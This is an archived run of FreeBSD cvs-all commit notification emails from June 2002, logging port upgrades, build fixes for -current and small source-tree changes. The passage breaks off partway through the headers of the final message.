FreeBSD.ORG demon 2002/06/16 02:42:30 PDT Modified files: net/gnomba Makefile distinfo pkg-descr pkg-plist net/gnomba/files patch-ab Added files: net/gnomba/files patch-samba-Makefile patch-samba-include-config.h Log: Update to 0.6.2. Submitted by: Martin Klaffenboeck (partially) Revision Changes Path 1.7 +7 -6 ports/net/gnomba/Makefile 1.2 +1 -1 ports/net/gnomba/distinfo 1.2 +48 -111 ports/net/gnomba/files/patch-ab 1.1 +21 -0 ports/net/gnomba/files/patch-samba-Makefile (new) 1.1 +51 -0 ports/net/gnomba/files/patch-samba-include-config.h (new) 1.2 +1 -2 ports/net/gnomba/pkg-descr 1.2 +3 -2 ports/net/gnomba/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:46:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CDFB737B400; Sun, 16 Jun 2002 02:46:47 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9klZ05741; Sun, 16 Jun 2002 02:46:47 -0700 (PDT) (envelope-from kris) Message-Id: <200206160946.g5G9klZ05741@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:46:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/benchmarks/iozone21/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:46:47 PDT Modified files: benchmarks/iozone21/files patch-aa Log: Fix build on current. Submitted by: ru Revision Changes Path 1.6 +2 -2 ports/benchmarks/iozone21/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:47:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F0D4037B40C; Sun, 16 Jun 2002 02:47:54 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9lsX05852; Sun, 16 Jun 2002 02:47:54 -0700 (PDT) (envelope-from kris) Message-Id: <200206160947.g5G9lsX05852@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:47:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/xmake/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:47:54 PDT Modified files: devel/xmake/files patch-aa Log: Fix build on current. Submitted by: ru Revision Changes Path 1.4 +8 -7 ports/devel/xmake/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:49: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D1F4837B407; Sun, 16 Jun 2002 02:49:01 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9n1N05968; Sun, 16 Jun 2002 02:49:01 -0700 (PDT) (envelope-from kris) Message-Id: <200206160949.g5G9n1N05968@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:49:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/pgpsendmail/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:49:01 PDT Modified files: mail/pgpsendmail/files patch-aa Log: Fix build on current. Submitted by: ru Revision Changes Path 1.3 +9 -9 ports/mail/pgpsendmail/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3: 3: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DC52F37B40F; Sun, 16 Jun 2002 03:02:59 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GA2xm08306; Sun, 16 Jun 2002 03:02:59 -0700 (PDT) (envelope-from kris) Message-Id: <200206161002.g5GA2xm08306@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:02:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/lcms/files Makefile.bsd X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:02:59 PDT Modified files: graphics/lcms/files Makefile.bsd Log: Fix build on current Revision Changes Path 1.3 +2 -1 ports/graphics/lcms/files/Makefile.bsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:10:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6ACB937B404; Sun, 16 Jun 2002 03:10:42 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAAgw13366; Sun, 16 Jun 2002 03:10:42 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161010.g5GAAgw13366@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 03:10:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules ports/lang Makefile ports/lang/nsl Makefile distinfo pkg-comment pkg-descr pkg-plist ports/lang/nsl/files patch-Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 03:10:42 PDT Modified files: . modules lang Makefile Removed files: lang/nsl Makefile distinfo pkg-comment pkg-descr pkg-plist lang/nsl/files patch-Makefile.in Log: nsl renamed to tensile Revision Changes Path 1.5364 +1 -1 CVSROOT/modules 1.300 +1 -1 ports/lang/Makefile 1.2 +0 -30 ports/lang/nsl/Makefile (dead) 1.2 +0 -1 ports/lang/nsl/distinfo (dead) 1.2 +0 -23 ports/lang/nsl/files/patch-Makefile.in (dead) 1.2 +0 -1 ports/lang/nsl/pkg-comment (dead) 1.2 +0 -20 ports/lang/nsl/pkg-descr (dead) 1.2 +0 -217 ports/lang/nsl/pkg-plist (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:12:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A5A9637B414; Sun, 16 Jun 2002 03:12:28 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GACSx13920; Sun, 16 Jun 2002 03:12:28 -0700 (PDT) (envelope-from kris) Message-Id: <200206161012.g5GACSx13920@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:12:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libshhopt/files Makefile Makefile.lib X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:12:28 PDT Modified files: devel/libshhopt/files Makefile Makefile.lib Log: Fix build on current Revision Changes Path 1.3 +2 -1 ports/devel/libshhopt/files/Makefile 1.2 +2 -1 ports/devel/libshhopt/files/Makefile.lib To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:14:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 56BD837B421; Sun, 16 Jun 2002 03:14:13 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAECJ14099; Sun, 16 Jun 2002 03:14:12 -0700 (PDT) (envelope-from kris) Message-Id: <200206161014.g5GAECJ14099@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:14:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libshhmsg/files Makefile.lib X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:14:12 PDT Modified files: devel/libshhmsg/files Makefile.lib Log: Fix build on current Revision Changes Path 1.2 +2 -1 ports/devel/libshhmsg/files/Makefile.lib To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:15:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 92FCC37B40E; Sun, 16 Jun 2002 03:15:15 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAFF114249; Sun, 16 Jun 2002 03:15:15 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161015.g5GAFF114249@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 03:15:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/libutils Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 03:15:15 PDT Modified files: lang/libutils Makefile distinfo Log: upgrade to 0.7.11 Revision Changes Path 1.2 +1 -1 ports/lang/libutils/Makefile 1.2 +1 -1 ports/lang/libutils/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:15:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 003FD37B408; Sun, 16 Jun 2002 03:15:33 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAFXk14317; Sun, 16 Jun 2002 03:15:33 -0700 (PDT) (envelope-from kris) Message-Id: <200206161015.g5GAFXk14317@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:15:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libshhmsg/files Makefile.lib X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:15:33 PDT Modified files: devel/libshhmsg/files Makefile.lib Log: Fix braino in previous revision Revision Changes Path 1.3 +1 -1 ports/devel/libshhmsg/files/Makefile.lib To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:18:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F80537B407; Sun, 16 Jun 2002 03:18:16 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAIGR14644; Sun, 16 Jun 2002 03:18:16 -0700 (PDT) (envelope-from kris) Message-Id: <200206161018.g5GAIGR14644@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:18:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libxalloc/files Makefile.lib X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:18:16 PDT Modified files: devel/libxalloc/files Makefile.lib Log: Fix build on current Revision Changes Path 1.2 +2 -1 ports/devel/libxalloc/files/Makefile.lib To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:21:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 534D737B40D; Sun, 16 Jun 2002 03:21:43 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GALht15342; Sun, 16 Jun 2002 03:21:43 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161021.g5GALht15342@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 03:21:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/tensile Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 03:21:43 PDT Modified files: lang/tensile Makefile distinfo pkg-plist Log: upgrade to 0.9p5 Revision Changes Path 1.2 +4 -3 ports/lang/tensile/Makefile 1.2 +1 -1 ports/lang/tensile/distinfo 1.2 +6 -0 ports/lang/tensile/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:30:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D5BD637B400; Sun, 16 Jun 2002 03:30:38 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAUcS15831; Sun, 16 Jun 2002 03:30:38 -0700 (PDT) (envelope-from kris) Message-Id: <200206161030.g5GAUcS15831@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:30:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libhash/files patch-Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:30:38 PDT Added files: devel/libhash/files patch-Makefile Log: Fix build on current Revision Changes Path 1.1 +12 -0 ports/devel/libhash/files/patch-Makefile (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:33:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CD24237B411; Sun, 16 Jun 2002 03:33:21 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAXLV16416; Sun, 16 Jun 2002 03:33:21 -0700 (PDT) (envelope-from kris) Message-Id: <200206161033.g5GAXLV16416@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 03:33:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libstocks/files Makefile.lib X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 03:33:21 PDT Modified files: devel/libstocks/files Makefile.lib Log: Fix build on current Revision Changes Path 1.2 +2 -1 ports/devel/libstocks/files/Makefile.lib To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 3:42:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4CC4937B410; Sun, 16 Jun 2002 03:42:06 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GAg6s17202; Sun, 16 Jun 2002 03:42:06 -0700 (PDT) (envelope-from mux) Message-Id: <200206161042.g5GAg6s17202@freefall.freebsd.org> From: Maxime Henrion Date: Sun, 16 Jun 2002 03:42:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf kern.pre.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mux 2002/06/16 03:42:05 PDT Modified files: sys/conf kern.pre.mk Log: Removed a duplicate -ffreestanding. It's already set in bsd.kern.mk. Approved by: bde Revision Changes Path 1.13 +1 -1 src/sys/conf/kern.pre.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 4:38:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C407C37B41F; Sun, 16 Jun 2002 04:38:04 -0700 (PDT) Received: (from ume@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GBc4r33293; Sun, 16 Jun 2002 04:38:04 -0700 (PDT) (envelope-from ume) Message-Id: <200206161138.g5GBc4r33293@freefall.freebsd.org> From: Hajimu UMEMOTO Date: Sun, 16 Jun 2002 04:38:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/pim6dd Makefile ports/net/pim6dd/files patch-ab patch-ac ports/net/pim6sd Makefile ports/net/pim6sd/files patch-ab patch-ac X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ume 2002/06/16 04:38:04 PDT Modified files: net/pim6dd Makefile net/pim6sd Makefile Added files: net/pim6dd/files patch-ab patch-ac net/pim6sd/files patch-ab patch-ac Log: Fix build on 5-CURRENT. Reported by: bento via kris Revision Changes Path 1.4 +1 -1 ports/net/pim6dd/Makefile 1.1 +13 -0 ports/net/pim6dd/files/patch-ab (new) 1.1 +13 -0 ports/net/pim6dd/files/patch-ac (new) 1.5 +1 -1 ports/net/pim6sd/Makefile 1.1 +13 -0 ports/net/pim6sd/files/patch-ab (new) 1.1 +13 -0 ports/net/pim6sd/files/patch-ac (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 4:39:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A1E1537B412; Sun, 16 Jun 2002 04:39:09 -0700 (PDT) Received: (from demon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GBd9833446; Sun, 16 Jun 2002 04:39:09 -0700 (PDT) (envelope-from demon) Message-Id: <200206161139.g5GBd9833446@freefall.freebsd.org> From: Dmitry Sivachenko Date: Sun, 16 Jun 2002 04:39:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/nessus-plugins-devel pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG demon 2002/06/16 04:39:09 PDT Modified files: security/nessus-plugins-devel pkg-plist Log: Fix PLIST. PR: 39261 Submitted by: Udo Schweigert (maintainer) Revision Changes Path 1.27 +0 -1 ports/security/nessus-plugins-devel/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 4:48:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DC34537B414; Sun, 16 Jun 2002 04:48:31 -0700 (PDT) Received: (from ume@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GBmVA34568; Sun, 16 Jun 2002 04:48:31 -0700 (PDT) (envelope-from ume) Message-Id: <200206161148.g5GBmVA34568@freefall.freebsd.org> From: Hajimu UMEMOTO Date: Sun, 16 Jun 2002 04:48:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/pim6dd Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ume 2002/06/16 04:48:31 PDT Modified files: net/pim6dd Makefile distinfo Log: Update to 20020403a. Revision Changes Path 1.5 +2 -2 ports/net/pim6dd/Makefile 1.2 +1 -1 ports/net/pim6dd/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:28: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 84B7F37B40D; Sun, 16 Jun 2002 05:28:02 -0700 (PDT) Received: (from tobez@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GCS2543085; Sun, 16 Jun 2002 05:28:02 -0700 (PDT) (envelope-from tobez) Message-Id: <200206161228.g5GCS2543085@freefall.freebsd.org> From: Anton Berezin Date: Sun, 16 Jun 2002 05:28:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/perl5 Makefile pkg-plist ports/lang/perl5/files patch-Install.pm use.perl X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tobez 2002/06/16 05:28:02 PDT Modified files: lang/perl5 Makefile pkg-plist lang/perl5/files use.perl Added files: lang/perl5/files patch-Install.pm Log: 1. Do not do rm -rf as a mean to deinstall this port. Instead, apart from normal rmdir'ing and unexec rmdir'ing, do a find | xargs rm for generated .ph files, since those will differ in different versions of FreeBSD just like .h files may not be the same. 2. Install.pm is broken in 5.6.1 and leads to the wrong .packlist generation, which, in turn, breaks BSDPAN. Fix that. 3. Extend use.perl to patch /etc/manpath.config so that manpages for modules installed by this and other p5- ports are be available. PR: 39108 (item 1) Reported by: Dan Nelson (item 1) Revision Changes Path 1.45 +1 -1 ports/lang/perl5/Makefile 1.1 +13 -0 ports/lang/perl5/files/patch-Install.pm (new) 1.4 +28 -2 ports/lang/perl5/files/use.perl 1.26 +82 -2 ports/lang/perl5/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:35:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2D5B637B401; Sun, 16 Jun 2002 05:35:18 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GCZIx44733; Sun, 16 Jun 2002 05:35:18 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206161235.g5GCZIx44733@freefall.freebsd.org> From: Maxim Sobolev Date: Sun, 16 Jun 2002 05:35:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/tar/lib error.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/16 05:35:17 PDT Modified files: contrib/tar/lib error.c Log: Our strerror_r(3) returns int, not char *. This fixes bogus error messages like "Cannot stat: (null)" Reported by: bde, kris Revision Changes Path 1.2 +6 -1 src/contrib/tar/lib/error.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:40:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EBF0C37B403; Sun, 16 Jun 2002 05:40:13 -0700 (PDT) Received: (from tobez@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GCeDY45580; Sun, 16 Jun 2002 05:40:13 -0700 (PDT) (envelope-from tobez) Message-Id: <200206161240.g5GCeDY45580@freefall.freebsd.org> From: Anton Berezin Date: Sun, 16 Jun 2002 05:40:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/perl5/files use.perl X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tobez 2002/06/16 05:40:13 PDT Modified files: lang/perl5/files use.perl Log: Fix manpath.config patching in case there is no system perl manpath (read: -current). No PORTREVISION bump. Revision Changes Path 1.5 +12 -5 ports/lang/perl5/files/use.perl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:44:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2425E37B415; Sun, 16 Jun 2002 05:44:07 -0700 (PDT) Received: (from cy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GCi7T46499; Sun, 16 Jun 2002 05:44:07 -0700 (PDT) (envelope-from cy) Message-Id: <200206161244.g5GCi7T46499@freefall.freebsd.org> From: Cy Schubert Date: Sun, 16 Jun 2002 05:44:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/krb5 pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG cy 2002/06/16 05:44:07 PDT Modified files: security/krb5 pkg-plist Log: I add missing krb5-config. Revision Changes Path 1.10 +1 -0 ports/security/krb5/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:52: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3209D37B41A; Sun, 16 Jun 2002 05:52:02 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GCq1j47904; Sun, 16 Jun 2002 05:52:01 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206161252.g5GCq1j47904@freefall.freebsd.org> From: Maxim Sobolev Date: Sun, 16 Jun 2002 05:52:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/ntp Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List 